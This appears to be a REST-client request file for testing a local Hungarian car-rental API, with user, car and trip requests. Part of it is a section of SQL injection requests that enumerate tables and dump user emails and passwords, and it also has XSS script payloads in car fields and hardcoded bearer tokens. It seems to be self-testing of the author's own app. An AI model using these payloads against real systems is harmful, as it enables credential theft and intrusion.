### #region users
### login
post http://localhost:3000/api/users/login
Content-Type: application/json

{
    "email": "nagy.bela@gmail.com",
    "password": "test123"
}

### Userek
get http://localhost:3000/users
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJyZXN1bHQiOnsiaWQiOjEsImZpcnN0TmFtZSI6IkLDqWxhIiwibGFzdE5hbWUiOiJOYWd5b24iLCJnZW5kZXIiOiJmw6lyZmkiLCJlbWFpbCI6Im5hZ3kuYmVsYUBnbWFpbC5jb20iLCJudW1iZXIiOjM0MzQzNTUzNH0sImlhdCI6MTY0NDkxNDQwMywiZXhwIjoxNjQ0OTE4MDAzfQ.HziYtxm6_7FDCIwLcupJVsE60purxD0Pu7Tib-o_lLA

### Egy user
get http://localhost:3000/users/2
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJyZXN1bHQiOnsiaWQiOjEsImZpcnN0TmFtZSI6IkLDqWxhIiwibGFzdE5hbWUiOiJOYWd5b24iLCJnZW5kZXIiOiJmw6lyZmkiLCJlbWFpbCI6Im5hZ3kuYmVsYUBnbWFpbC5jb20iLCJudW1iZXIiOjM0MzQzNTUzNH0sImlhdCI6MTY0NDMxNTE5NCwiZXhwIjoxNjQ0MzE4Nzk0fQ.q2ih8UiVs51Pa3UEc908O6tLt5Upl9NOlidEmQSksMQ

### User hozzáadása
post http://localhost:3000/users
Content-Type: application/json

{
    "firstName": "Béla",
    "lastName": "Fehér",
    "gender": "férfi",
    "userName": "bela",
    "email": "feher.bela@gmail.com",
    "password": "jozsi123",
    "number": 33333333
}

### User módosítása
put http://localhost:3000/users/2
Content-Type: application/json

{
    "firstName": "Józsi",
    "lastName": "Balog",
    "gender": "férfi",
    "userName": "jozsika",
    "email": "balog.jozsi@gmail.com",
    "password": "test123",
    "number": 123456
}

### Delete user
delete http://localhost:3000/users/1
### #endregion users

### ---------------------------------------
### get cars
get http://localhost:3000/cars

### get car by id
get http://localhost:3000/cars/602

### sql injections
### get adabázis
get http://localhost:3000/cars/1  UNION SELECT database(), '', '', ''

### get táblák nevei
get http://localhost:3000/cars/1  union select table_name, '','', '' from information_schema.tables where table_schema='cars'

### users tábla oszlopai
get http://localhost:3000/cars/1 union select column_name, '', '', data_type from information_schema.columns where table_name='users' and table_schema='cars'


### get user adatok
get http://localhost:3000/cars/1 union select email, password, '','' from users

### delte car by id
delete http://localhost:3000/cars/1

### post car
post http://localhost:3000/cars
Content-Type: application/json

{
    "name": "Mercedes",
    "licenceNumber": "MM-111",
    "hourlyRate": 2500
}

### post car XSS teszt
post http://localhost:3000/cars
Content-Type: application/json

{
    "name": "X Mercedes <script>alert('betörtem')</script>",
    "licenceNumber": "MM-111 <script>alert('betörtem')</script>",
    "hourlyRate": "2500  <script>alert('betörtem')</script>"
}

### put car by id
put http://localhost:3000/cars/4
Content-Type: application/json

{
    "name": "Mercedes2",
    "licenceNumber": "MM-222",
    "hourlyRate": 2600
}

### put car by id XSS teszt
put http://localhost:3000/cars/11
Content-Type: application/json

{
    "name": "XY Mercedes <script>alert('betörtem')</script>",
    "licenceNumber": "YM-111 <script>alert('betörtem')</script>",
    "hourlyRate": "2600  <script>alert('betörtem')</script>"
}

### get trips by carId
get http://localhost:3000/tripsByCarId/1

### get trips by id
get http://localhost:3000/trips/56

### get trips
get http://localhost:3000/trips

### post trip
post http://localhost:3000/trips
Content-Type: application/json

{
    "numberOfMinits": 56,
    "date": "2022.10.13 01:36:00",
    "carId": 3
}


### put trip by id
put http://localhost:3000/trips/56
Content-Type: application/json

{
    "numberOfMinits": 55,
    "date": "2022.10.13 01:35:00",
    "carId": 2
}